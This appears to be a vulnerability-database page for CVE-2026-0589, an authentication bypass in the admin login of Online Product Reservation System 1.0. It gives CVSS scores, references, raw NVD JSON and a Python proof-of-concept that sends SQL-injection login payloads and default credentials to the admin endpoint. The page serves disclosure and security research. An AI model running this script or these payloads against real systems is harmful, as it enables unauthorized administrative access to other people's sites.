CVE-2026-0589

Description

A vulnerability was found in code-projects Online Product Reservation System 1.0. Impacted is an unknown function of the component Administration Backend. The manipulation results in improper authentication. The attack may be performed from remote. The exploit has been made public and could be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:online_product_reservation_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Online Product Reservation System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-0589 PoC - Online Product Reservation System 1.0 Authentication Bypass
Target: code-projects Online Product Reservation System 1.0
Vulnerability: Improper Authentication in Administration Backend
"""

import requests
import sys

def exploit_auth_bypass(target_url):
    """
    Exploit authentication bypass vulnerability in admin panel
    """
    # Target admin login endpoint
    admin_url = f"{target_url}/admin/login.php"
    
    # Common admin credentials to try
    payloads = [
        {"username": "admin' OR '1'='1", "password": "admin' OR '1'='1"},
        {"username": "admin' --", "password": "anything"},
        {"username": "admin' #", "password": "anything"},
        {"username": "' OR '1'='1' --", "password": "' OR '1'='1' --"},
        {"username": "admin", "password": "admin"}
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Admin URL: {admin_url}")
    print("[*] Starting authentication bypass test...\n")
    
    for i, payload in enumerate(payloads, 1):
        print(f"[*] Testing payload {i}: {payload}")
        
        try:
            response = requests.post(admin_url, data=payload, timeout=10)
            
            # Check for successful login indicators
            if "dashboard" in response.text.lower() or "admin" in response.url:
                print(f"[+] Potential successful bypass with payload: {payload}")
                print(f"[+] Response URL: {response.url}")
                return True
            elif response.status_code == 200:
                print(f"[-] Payload {i} failed, status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request error: {e}")
    
    print("\n[!] All authentication bypass attempts failed")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-0589.py <target_url>")
        print("Example: python cve-2026-0589.py http://localhost/online-product-reservation")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_auth_bypass(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0589
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0589
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0589/
[4] VulDB https://vuldb.com/cve/CVE-2026-0589
[5] https://code-projects.org/
[6] https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/auth_bypass_admin_panel.md
[7] https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/auth_bypass_admin_panel.md#poc
[8] https://vuldb.com/?ctiid.339499
[9] https://vuldb.com/?id.339499
[10] https://vuldb.com/?submit.731127

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0589", "sourceIdentifier": "[email protected]", "published": "2026-01-05T13:15:55.457", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Online Product Reservation System 1.0. Impacted is an unknown function of the component Administration Backend. The manipulation results in improper authentication. The attack may be performed from remote. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_product_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "20DD85F8-8BAC-44C5-99EC-F57924CE08AE"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/auth_bypass_admin_panel.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/auth_bypass_admin_panel.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339499", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339499", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.731127", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}